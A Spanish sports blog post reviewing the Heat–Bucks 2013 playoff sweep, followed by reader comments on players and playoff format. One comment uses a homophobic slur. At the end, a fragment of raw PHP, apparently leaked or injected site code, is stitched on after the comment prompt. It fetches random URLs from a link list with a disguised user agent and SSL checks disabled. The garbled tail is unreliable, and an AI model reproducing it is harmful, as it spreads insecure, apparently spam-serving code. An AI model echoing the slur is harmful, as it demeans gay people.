Resumen Miami Heat 4 – Milwaukee Bucks 0

29 de April de 2013 por TheDeerHunter

lebron bucksAprovechamos para colgarnos medallas, lo que va delante va delante. Acierto pleno en el 4-0. Tenemos un acierto clínico al nivel de los mayores gurús de este deporte, o del mismísimo Nostradamus… lógicamente estamos bromeando, los más audaces daban a Miami en 5. Hubiera resultado sorpresa mayúscula llegar a un sexto choque.

Ha sido la serie más plácida desde que a Mr. Riley se le ocurrió juntar a estos monstruos. Siendo justos es difícil imaginar al equipo de Jim Boylan en postemporada de no ser por la tradicional wild-card que se regala en la octava plaza de la conferencia este. Por nombres quizá lo fuera, pero el juego de sus principales figuras ha sido excesivamente irregular durante todo el curso y, en la hora de la verdad, todavía más.

No hay que darle muchas vueltas. Apostaría a que LeBron liderando un equipo de buenos jugadores de la NCAA hubiera superado esta serie. Los Bucks no han creído en sí mismos en ningún momento, no han llegado ni a la sombra de lo que perfectamente podrían ser. El mejor ejemplo de esto es el rebote, la mayor virtud de los Bucks y el mayor defecto rival, ¿resultado? Los campeones han dominado los tableros por una diferencia de casi 10 rebotes de promedio. Resulta ilustrativo, porque todo ha ido en la misma línea. Hemos visto un Jennings terrorífico, con porcentajes ridículos y una dirección más bien sosa; a Ellis algo mejor que en su versión de la regular contra este equipo pero por debajo de sus promedios generales; un Ersan apagado comparándolo con su desempeño sus últimos meses; Sanders desubicado, Redick desaparecido o qué decir de Dalembert, Ayón…

Y en frente unos Heat regulando, con un LeBron sin alardes y las otras puntas del tridente limitando minutos y esfuerzos, más la grata sorpresa de un Ray Allen en modo killer y el pájaro Andersen ganándose el cocido… Lo que no puede ser, no puede ser y además es imposible.

PREMIOS

MVP: LeBron semi-reposando. “Sólo” 24 puntitos y medio, con 8 rebotes, más de 7 asistencias y casi 2 robos y un tapón. También ha gustado mucho Ray Allen, erigiéndose en la circunstancial segunda espada del equipo y reventando records de triples. Fino, fino el amigo Ray en estas fechas.

bjenningsLa sorpresa: Ha aprovechado muy bien Chris Andersen los minutillos que le han ido tocando. Energía en estado puro y espectáculo, que es lo que les hace falta al público del American Airlines para no quedarse dormidos alguna tarde.

La decepción: La peor versión de Jennings. Cuando está mal en el tiro está verdaderamente mal. No alcanza el 30% siendo el que más lanza. En la dirección tampoco ha brillado en esta ocasión. Podemos salvar a duras penas su primer partido.

El mayor esfuerzo en vano: Dentro de las circunstancias podemos calificar la serie de Monta Ellis como de bastante digna, aunque en términos de eficacia el mejor de los suyos ha sido Mike Dunleavy en los 20 minutos que le han dejado jugar por choque.

Comenta

7 comentarios a esta entrada

  1. melo15 dice:
    #1

    A vosotros Brandon Jennings os parece un base de elite?
    Yo aún nose en que destaca. En teoría era un gran anotador, pero promediar 18 puntos con malos porcentajes no lo demuestran, tampoco destaca como base puro y no rinde en defensa.
    Se merece ganar 10M?

      Citar

  2. Sancho88 dice:
    #2

    Esta serie se la podían haber ahorrado… menudos mariconazos los bucks… y lo más fuerte es que ya sabíamos que iban a hacer una puta mierda… joder. Y si lo piensas, si no hubieran llegado Bucks, ahí tendríamos a los penosos Sixers o vete tu a saber… en serio, habría que poner alguna norma tipo… si no llegas al 50% de victorias, no puedes jugar playoffs, y así nos quitaríamos estas pachangas.

    O, que abran la liga, y clasificarse para playoffs no dependa de en qué conferencia juegues, sino de tu balance. Así se tomarían la temporada más en serio en el Este, que no paran de sestear y dormir la mona. Apuesto a que un encuentro entre Jazz o Dallas contra Heat habría dado muchísimo más de sí.

    Enhorabuena Deer, porque da una pereza analizar lo que has analizado… hay que exarle pelotas la verdad

      Citar

  3. Denise dice:
    #3

    melo15:
    A vosotros Brandon Jennings os parece un base de elite?
    Yo aún nose en que destaca. En teoría era un gran anotador, pero promediar 18puntos con malos porcentajes no lo demuestran, tampoco destaca como base puro y no rinde en defensa.
    Se merece ganar 10M?

    Yo por 10 kilos lo ficho para Orlando con los ojos cerrados, aunque debe mejorar su selección de tiro.
    Tener un tío que se busque sus propios tiros y en un momento de inspiración te pueda enchufar 15 puntos en 5 minutos se paga con dinero..

      Citar

  4. Denise dice:
    #4

    Sancho88:
    Esta serie se la podían haber ahorrado… menudos mariconazos los bucks… y lo más fuerte es que ya sabíamos que iban a hacer una puta mierda… joder. Y si lo piensas, si no hubieran llegado Bucks, ahí tendríamos a los penosos Sixers o vete tu a saber… en serio, habría que poner alguna norma tipo… si no llegas al 50% de victorias, no puedes jugar playoffs, y así nos quitaríamos estas pachangas.

    O, que abran la liga, y clasificarse para playoffs no dependa de en qué conferencia juegues, sino de tu balance. Así se tomarían la temporada más en serio en el Este, que no paran de sestear y dormir la mona. Apuesto a que un encuentro entre Jazz o Dallas contra Heat habría dado muchísimo más de sí.

    Enhorabuena Deer, porque da una pereza analizar lo que has analizado… hay que exarle pelotas la verdad

    Yo no culpo a los Bucks de la pachanga, yo culpo a los Heat por ser demasiado buenos. Salvo NY, no creo que haya ninguno en el Este con capacidad para ganarle 2 partidos de playoffs a Miami.
    En lo de las conferencias te doy la razón, pero para eso, lo primero que habría que hacer es que todos jugasen los mismos partidos contra todos, es decir, liga regular a 58 partidos (2 veces contra cada rival independientemente de la conferencia), y no creo que la NBA esté ahora para cambios tan radicales.

    Yo lo que haría es poner las rondas a 5 partidos, excepto la final y las finales de conferencia.

      Citar

  5. Denise dice:
    #5

    Y por cierto, que mala gestión para los Bucks y salvo sorpresa, se avecinan años dificiles para ellos.
    Llegan al verano con sus dos estrellas Jennings y Ellis como agentes libres y no sería de extrañar que se quedasen sin los dos. Se deshacen de Harris que ha acabado destapandose como una futura sensación para traer a JJ Redick, el cual no se habla con su entrenador y parece dificil que renueve si el coach continua..
    Siguen gastando para los proximos años 15 millones anuales entre Ilyasova y Gooden; Udoh no acaba de arrancar como un jugador decente de rotación.
    En fin…por ahora Sanders y poco más.

      Citar

  6. Esteban dice:
    #6

    mal muy mal los bucks, tan mal como cualquier equipo que quiera hacer a monta ellis su jugador franquicia

    ellis seria un escolta tirador de lujo para los PACERS, o un sexto hombre brillante para los nets o bulls

    ero su status de jugadro franquicia esta destruido, mientras alguien apueste tan fuerte por el, dudo que logren algo grande

    por otra parte, los bucks sumaron malos contratos sin necesidasdes, caso de udoh o gooden que hacen complicado reconstruirse

    ellis renovara, puesto que dudo que alguien le forezca mas de 11 millones, y desp de cobrar ese paston, creo que bajara las pretenciones y buscara ser un j.r. smith

    desde el banco hay carrera por hacer

      Citar

  7. Alfredo dice:
    #7

    Al hilo de lo que dice Sancho, los clasificados para play offs deberian ser los 7 primeros, y el octavo, que sea el no clasificado que mas partidos gano desde el All Star. Al menos que sea un premio merecido para que el que llegue a play offs ponga un poco mas de resistencia y esten en forma y no jueguen desde febrero a perder

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>